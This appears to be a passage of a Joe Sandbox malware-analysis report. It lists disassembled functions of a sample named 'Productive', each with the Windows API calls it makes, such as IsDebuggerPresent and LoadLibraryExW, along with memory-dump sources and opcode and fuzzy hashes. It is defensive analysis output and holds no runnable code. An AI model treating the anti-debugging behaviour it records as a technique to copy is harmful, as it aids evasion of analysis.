                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: IconNotifyShell_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1144537725-0
                                                                                                                                                                • Opcode ID: b0a6c4be565a90180b0daa53a075e2cfdf69ace838fe737b841f1633a05cf19a
                                                                                                                                                                • Instruction ID: b36952305a401eb544dd4c62dcfba32799a51e62ae18c94a5ed64f36e85680df
                                                                                                                                                                • Opcode Fuzzy Hash: b0a6c4be565a90180b0daa53a075e2cfdf69ace838fe737b841f1633a05cf19a
                                                                                                                                                                • Instruction Fuzzy Hash: D43161B05157118FD721DF25D884B97BBF8FB49304F000E2EF69A86251EB71B994CB92
                                                                                                                                                                APIs
                                                                                                                                                                • IsThemeActive.UXTHEME ref: 002C5FEF
                                                                                                                                                                  • Part of subcall function 002D359C: DecodePointer.KERNEL32(00000001,?,002C6004,00308892), ref: 002D35AE
                                                                                                                                                                  • Part of subcall function 002D359C: EncodePointer.KERNEL32(?,?,002C6004,00308892), ref: 002D35B9
                                                                                                                                                                  • Part of subcall function 002C5F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002C5F18
                                                                                                                                                                  • Part of subcall function 002C5F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002C5F2D
                                                                                                                                                                  • Part of subcall function 002C5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002C526C
                                                                                                                                                                  • Part of subcall function 002C5240: IsDebuggerPresent.KERNEL32 ref: 002C527E
                                                                                                                                                                  • Part of subcall function 002C5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 002C52E6
                                                                                                                                                                  • Part of subcall function 002C5240: SetCurrentDirectoryW.KERNEL32(?), ref: 002C5366
                                                                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 002C602F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1658450864-0
                                                                                                                                                                • Opcode ID: 427102cea209b627287e46ba01d44ed2d5ae7d68f2eeb47d3d812b57cf26001d
                                                                                                                                                                • Instruction ID: 34348c5d28dd7f8b588b3769c3ef2895f03ebdfe6fc9242948101977dd6d01e7
                                                                                                                                                                • Opcode Fuzzy Hash: 427102cea209b627287e46ba01d44ed2d5ae7d68f2eeb47d3d812b57cf26001d
                                                                                                                                                                • Instruction Fuzzy Hash: 961181715183019BC321EF65EC4994ABBECEF94350F00491EF55887272DBB09594CF92
                                                                                                                                                                APIs
                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,002D9C54,00000000,002D8D5D,002D59C3), ref: 002D2F99
                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,002D9C54,00000000,002D8D5D,002D59C3), ref: 002D2FAB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                • Opcode ID: 3fc50965e757cf5e5af37ab401ea74967396feaed9bcbca6dfa8fea6cecee820
                                                                                                                                                                • Instruction ID: 2946883a36d7133106186b94cb7776b1be2750a29f12f4eef8f1295e42217498
                                                                                                                                                                • Opcode Fuzzy Hash: 3fc50965e757cf5e5af37ab401ea74967396feaed9bcbca6dfa8fea6cecee820
                                                                                                                                                                • Instruction Fuzzy Hash: 2CE0CD351146099FDB152FB0EC0DB497BECAF11741F544816FE0C991A0DF305CA0CB80
                                                                                                                                                                APIs
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00340994,00000000,?,002E8449,00340994,?,?,?,?,?,?,?,?,00000000,00000109), ref: 002E0D5D
                                                                                                                                                                • GetLastError.KERNEL32(?,002E8449,00340994,?,?,?,?,?,?,?,?,00000000,00000109), ref: 002E0D67
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                • Opcode ID: 61485f665318a0d168471956c3e75709112a1cba65732d9a50a91342ea3e1266
                                                                                                                                                                • Instruction ID: d42124662739ce53686461459d91cfe2b5925c100de4808fe91fe4e33a11352f
                                                                                                                                                                • Opcode Fuzzy Hash: 61485f665318a0d168471956c3e75709112a1cba65732d9a50a91342ea3e1266
                                                                                                                                                                • Instruction Fuzzy Hash: 46014C3667199016C6251ABAAC8577D274DCB42B70F580249E918872D2DEE0FCE286C0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LoadString
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2948472770-0
                                                                                                                                                                • Opcode ID: 7015c4e73f40ba21b82d340f56d8b6697639b719d937e19be027c42c8fce4bb1
                                                                                                                                                                • Instruction ID: 4b5c6e1d08201346b547e47ced76ef888b78b76a1781a4dfcf1cb5ef8235dbcc
                                                                                                                                                                • Opcode Fuzzy Hash: 7015c4e73f40ba21b82d340f56d8b6697639b719d937e19be027c42c8fce4bb1
                                                                                                                                                                • Instruction Fuzzy Hash: B5B17A34A1011AEFCB15EF94D891DEEB7B5FF48310F24911AF915AB291EB30AA51CF90
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 289793c30da7743c8e5b20b37418be39d929d95658c883a3550b7fe6be7b1bf4
                                                                                                                                                                • Instruction ID: 24ca3c26a58930ace81011557b8fdd315df61192d08e49a60dbc19427f444d9b
                                                                                                                                                                • Opcode Fuzzy Hash: 289793c30da7743c8e5b20b37418be39d929d95658c883a3550b7fe6be7b1bf4
                                                                                                                                                                • Instruction Fuzzy Hash: 22A1D231920AA98BDB31DF18C984BE8B7B6AF05354F5481DAD48897352D3F0AEE1CF50
                                                                                                                                                                APIs
                                                                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 0031614E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BuffCharLower
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2358735015-0
                                                                                                                                                                • Opcode ID: 3bd6fec43136d5d8fb29cffcab4caa564b664885faf672d762102e8b94d605ff
                                                                                                                                                                • Instruction ID: acea837d91a973775b4455bf33dcddc4c4eaae1ae20bece666a63c9f61ef38fb
                                                                                                                                                                • Opcode Fuzzy Hash: 3bd6fec43136d5d8fb29cffcab4caa564b664885faf672d762102e8b94d605ff
                                                                                                                                                                • Instruction Fuzzy Hash: 4741C676600209AFDB16DFA4C8829EE73BCFF58350B11463EE516D7251EB309E95CB50
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                                                • Opcode ID: e7b0407cc3dcf903717266b78cf303ceea50831b232483edda08c74d7e1809d4
                                                                                                                                                                • Instruction ID: a5a1585e220b6decaa96f772f91e1b52fc33811c137bf4fa0e85a437f317f1f1
                                                                                                                                                                • Opcode Fuzzy Hash: e7b0407cc3dcf903717266b78cf303ceea50831b232483edda08c74d7e1809d4
                                                                                                                                                                • Instruction Fuzzy Hash: 3D4116745283519FDB14DF14C488B5ABBE1BF45348F0988ACE8899B362C376ECA5CB52
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002DA038: GetStartupInfoW.KERNEL32(?), ref: 002DA042
                                                                                                                                                                • GetCommandLineW.KERNEL32(0036CD38,00000014), ref: 002D7F23
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CommandInfoLineStartup
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 582193876-0
                                                                                                                                                                • Opcode ID: d64bf3aaa94d937938d542061b368b1d064cd2e12c1af276d1363c87b82b3090
                                                                                                                                                                • Instruction ID: 2d73b7b374c5cd08a0f39eb1bd0980d589d42b4276b72b807ef079fd3176caa6
                                                                                                                                                                • Opcode Fuzzy Hash: d64bf3aaa94d937938d542061b368b1d064cd2e12c1af276d1363c87b82b3090
                                                                                                                                                                • Instruction Fuzzy Hash: 2321A96167C31299DB31BBB09847B6E22945F10715F60496BF504DA7C2FFB8CDB08E51
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002C4B29: FreeLibrary.KERNEL32(00000000,?), ref: 002C4B63
                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002C27AF,?,00000001), ref: 002C49F4
                                                                                                                                                                  • Part of subcall function 002C4ADE: FreeLibrary.KERNEL32(00000000), ref: 002C4B18
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$Free$Load
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2391024519-0
                                                                                                                                                                • Opcode ID: 51fe4e6be7745fd2435910c4e923ceaa31db7de77dd0722118299de8606b0b79
                                                                                                                                                                • Instruction ID: de47b007582b1281e2ec62795f9012a1d7f638e43de249f926e574acae789a0c
                                                                                                                                                                • Opcode Fuzzy Hash: 51fe4e6be7745fd2435910c4e923ceaa31db7de77dd0722118299de8606b0b79
                                                                                                                                                                • Instruction Fuzzy Hash: 7A11C831660205ABCB25FB608C36FAF77A99F44701F10851DF945A61D1EF709E20AB94
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                                                • Opcode ID: ce1ec26286aadee2487d6f4bd8fb69c8ebafcea3deefc6242fe8a65225db8a5c
                                                                                                                                                                • Instruction ID: 67435567bbc18bab727036e8469312a37d4aa761b9811a59abf3f3ccd3ced8ec
                                                                                                                                                                • Opcode Fuzzy Hash: ce1ec26286aadee2487d6f4bd8fb69c8ebafcea3deefc6242fe8a65225db8a5c
                                                                                                                                                                • Instruction Fuzzy Hash: C1212474528341DFDB14DF14C448B5ABBE4BF84344F054968F98A5B722C731E869CB52
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(01390000,00000000,00000001,?,00000004,?,?,002D1003,?), ref: 002D597F
                                                                                                                                                                  • Part of subcall function 002DA3F8: GetModuleFileNameW.KERNEL32(00000000,003753BA,00000104,00000004,00000001,002D1003), ref: 002DA48A
                                                                                                                                                                  • Part of subcall function 002D32CF: ExitProcess.KERNEL32 ref: 002D32DE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateExitFileHeapModuleNameProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1715456479-0
                                                                                                                                                                • Opcode ID: 77f2ba629ac0c64ca13c3c1af409848840fd9888da7b5781377c2b4afe4ae800
                                                                                                                                                                • Instruction ID: 3efd18cb68483b4f0a2259d76552c8f5606271c121eca9fe5b43887dd3669a65
                                                                                                                                                                • Opcode Fuzzy Hash: 77f2ba629ac0c64ca13c3c1af409848840fd9888da7b5781377c2b4afe4ae800
                                                                                                                                                                • Instruction Fuzzy Hash: D9014932331B22DAD6152B35EC61AAE324D8F52370F500427F4089B3D1DEF08C604AA1
                                                                                                                                                                APIs
                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00324998
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentVariable
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1431749950-0
                                                                                                                                                                • Opcode ID: 897a564c747a2507adacc3c6859eb6c1a108db14399656ab8763f17aeae329bc
                                                                                                                                                                • Instruction ID: e0197e15d4f715c3c17a51a699e3b7bcce66256c5f46df4198d3e4b59401ac49
                                                                                                                                                                • Opcode Fuzzy Hash: 897a564c747a2507adacc3c6859eb6c1a108db14399656ab8763f17aeae329bc
                                                                                                                                                                • Instruction Fuzzy Hash: 10F06D35618104AF9B15FB64D846D9F77BCEF49320B00405AF8089B361DE70BD918B50
                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,002C27AF,?,00000001), ref: 002C4A63
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                • Opcode ID: 1895ca1060ace598b8e6370d5afbb999f63d079155140f12b7215e21b239f9cb
                                                                                                                                                                • Instruction ID: 748114f2ff492bd03f47adfcafcd6be9bb87be90f399be7bd5ce64a3d87181ee
                                                                                                                                                                • Opcode Fuzzy Hash: 1895ca1060ace598b8e6370d5afbb999f63d079155140f12b7215e21b239f9cb
                                                                                                                                                                • Instruction Fuzzy Hash: A7F05871160702CFCB34AF64E4A0917BBF0AB04325310AA2EE5D682610C7719950CF04
                                                                                                                                                                APIs
                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000002,?), ref: 002C5B1F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: IconNotifyShell_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1144537725-0
                                                                                                                                                                • Opcode ID: 44472a25fce799d1fb04096292ef3d8a04da1dd47b205c3eb76208e52a945c7d
                                                                                                                                                                • Instruction ID: 565f34904ca2877c3ae0d68875ead8cb5cbe6fa6cb79298c7eb9b1576df5b890
                                                                                                                                                                • Opcode Fuzzy Hash: 44472a25fce799d1fb04096292ef3d8a04da1dd47b205c3eb76208e52a945c7d
                                                                                                                                                                • Instruction Fuzzy Hash: 68F082709183189BD7A38B24DC457957BBC9701308F0001EAEA4C96296DB715BD8CF51
                                                                                                                                                                APIs
                                                                                                                                                                • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 002D09E4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LongNamePath
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 82841172-0
                                                                                                                                                                • Opcode ID: 869b7fced3e2b06e38c05e707272a6a7347018f779500ff7a3ea57f702035460
                                                                                                                                                                • Instruction ID: 3ea825ce9791d165966ea9065e9f145a22b07dd49da9b106a2f2b2e686a11d54
                                                                                                                                                                • Opcode Fuzzy Hash: 869b7fced3e2b06e38c05e707272a6a7347018f779500ff7a3ea57f702035460
                                                                                                                                                                • Instruction Fuzzy Hash: 82E08636A1412857C72196989C06FEE77DDDF8A791F0402B6FD08D7204D970ACA18AD1
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,00313BFE), ref: 00314FED
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
